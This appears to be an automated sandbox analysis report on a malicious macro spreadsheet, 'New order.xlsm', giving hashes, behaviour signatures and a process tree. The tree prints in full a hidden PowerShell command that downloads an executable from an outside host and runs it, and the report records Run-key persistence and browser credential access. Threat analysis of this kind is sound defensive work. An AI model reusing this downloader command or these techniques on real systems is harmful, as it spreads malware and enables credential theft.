Analysis
- Max time kernel: 149s
- Max time network: 150s
- Platform: windows7_x64
- Resource: win7v200430
- Submitted: 09-07-2020 18:32

- Static task: static1
- Behavioral task: behavioral1
  - Sample: New order.xlsm
  - Resource: win7v200430
- Behavioral task: behavioral2
  - Sample: New order.xlsm
  - Resource: win10
General
- Target: New order.xlsm
- Size: 92KB
- MD5: 2433e76542036ab53b138a98eeda548a
- SHA1: fa75a6ce57ec974345eb05a9d5e587a1eef772be
- SHA256: 148a026124126abf74c390c69fbd0bcebce06b600c6a35630cdce29a85a765fc
- SHA512: 3ae2f70b3d39d85d1befea180ee75815abb20349a90cf3678db2e001d5ac362f68230e30680c897e33a05a6dbc1d8a776505751da043797b15327bb38251d243

Malware Config
- Extracted: http://sagc.be/svc.exe
Signatures
- Suspicious use of FindShellTrayWindow (4 IoCs)
  Processes (pid, process):
    1200 | Explorer.EXE (4 entries)
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes (pid, process):
    1492 | EXCEL.EXE
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes (description, pid, pid_target, process, target process):
    Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | 1044 | 1492 | powershell.exe | EXCEL.EXE
- Suspicious behavior: MapViewOfSection (7 IoCs)
  Processes (pid, process):
    1688 | putty.exe (3 entries)
    1904 | cmstp.exe (4 entries)
- Blacklisted process makes network request (1 IoC)
  Processes (flow, pid, process):
    4 | 1044 | powershell.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials and similar secrets.
- Loads dropped DLL (1 IoC)
  Processes (pid, process):
    464 | putty.exe
- Office loads VBA resources, possible macro or embedded object present
- Adds Run entry to start application (2 TTPs, 2 IoCs)
  Processes (description, ioc, process):
    Key created | \Registry\Machine\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run | cmstp.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\JV1LTXC8TL = "C:\\Program Files (x86)\\Vmrtp8bmx\\vgardyl_r.exe" | cmstp.exe
- Suspicious behavior: EnumeratesProcesses (22 IoCs)
  Processes (pid, process):
    1044 | powershell.exe
    1688 | putty.exe (2 entries)
    1904 | cmstp.exe (19 entries)
- Executes dropped EXE (2 IoCs)
  Processes (pid, process):
    464 | putty.exe
    1688 | putty.exe
- Suspicious use of SetThreadContext (3 IoCs)
  Processes (description, pid, process, target process):
    PID 464 set thread context of 1688 | 464 | putty.exe | putty.exe
    PID 1688 set thread context of 1200 | 1688 | putty.exe | Explorer.EXE
    PID 1904 set thread context of 1200 | 1904 | cmstp.exe | Explorer.EXE
- Suspicious use of SendNotifyMessage (4 IoCs)
  Processes (pid, process):
    1200 | Explorer.EXE (4 entries)
- Suspicious use of SetWindowsHookEx (5 IoCs)
  Processes (pid, process):
    1492 | EXCEL.EXE (5 entries)
- Suspicious use of WriteProcessMemory (30 IoCs)
  Processes (description, pid, process, target process):
    PID 1492 wrote to memory of 1044 | 1492 | EXCEL.EXE | powershell.exe (3 entries)
    PID 1044 wrote to memory of 464 | 1044 | powershell.exe | putty.exe (4 entries)
    PID 464 wrote to memory of 1688 | 464 | putty.exe | putty.exe (7 entries)
    PID 1200 wrote to memory of 1904 | 1200 | Explorer.EXE | cmstp.exe (7 entries)
    PID 1904 wrote to memory of 2024 | 1904 | cmstp.exe | cmd.exe (4 entries)
    PID 1904 wrote to memory of 596 | 1904 | cmstp.exe | Firefox.exe (5 entries)
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes (description, pid, process):
    Token: SeDebugPrivilege | 1044 | powershell.exe
    Token: SeDebugPrivilege | 1688 | putty.exe
    Token: SeDebugPrivilege | 1904 | cmstp.exe
- Drops file in Program Files directory (1 IoC)
  Processes (description, ioc, process):
    File opened for modification | C:\Program Files (x86)\Vmrtp8bmx\vgardyl_r.exe | cmstp.exe
- Modifies Internet Explorer settings
  Processes (description, ioc, process):
    Key created | \Registry\User\S-1-5-21-910373003-3952921535-3480519689-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | cmstp.exe
Processes (nested by parent)
- C:\Windows\Explorer.EXE, PID 1200
  Command line: C:\Windows\Explorer.EXE
  Signatures:
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
  Children:
    - C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, PID 1492
      Command line: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\New order.xlsm"
      Signatures:
        - Suspicious behavior: AddClipboardFormatListener
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
      Children:
        - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, PID 1044
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://sagc.be/svc.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')
          Signatures:
            - Process spawned unexpected child process
            - Blacklisted process makes network request
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory
            - Suspicious use of AdjustPrivilegeToken
          Children:
            - C:\Users\Admin\AppData\Local\Temp\putty.exe, PID 464
              Command line: "C:\Users\Admin\AppData\Local\Temp\putty.exe"
              Signatures:
                - Loads dropped DLL
                - Executes dropped EXE
                - Suspicious use of SetThreadContext
                - Suspicious use of WriteProcessMemory
              Children:
                - C:\Users\Admin\AppData\Local\Temp\putty.exe, PID 1688
                  Command line: "{path}"
                  Signatures:
                    - Suspicious behavior: MapViewOfSection
                    - Suspicious behavior: EnumeratesProcesses
                    - Executes dropped EXE
                    - Suspicious use of SetThreadContext
                    - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\autofmt.exe, PID 1920
      Command line: "C:\Windows\SysWOW64\autofmt.exe"
    - C:\Windows\SysWOW64\cmstp.exe, PID 1904
      Command line: "C:\Windows\SysWOW64\cmstp.exe"
      Signatures:
        - Suspicious behavior: MapViewOfSection
        - Adds Run entry to start application
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of SetThreadContext
        - Suspicious use of WriteProcessMemory
        - Suspicious use of AdjustPrivilegeToken
        - Drops file in Program Files directory
        - Modifies Internet Explorer settings
      Children:
        - C:\Windows\SysWOW64\cmd.exe, PID 2024
          Command line: /c del "C:\Users\Admin\AppData\Local\Temp\putty.exe"
        - C:\Program Files\Mozilla Firefox\Firefox.exe, PID 596
          Command line: "C:\Program Files\Mozilla Firefox\Firefox.exe"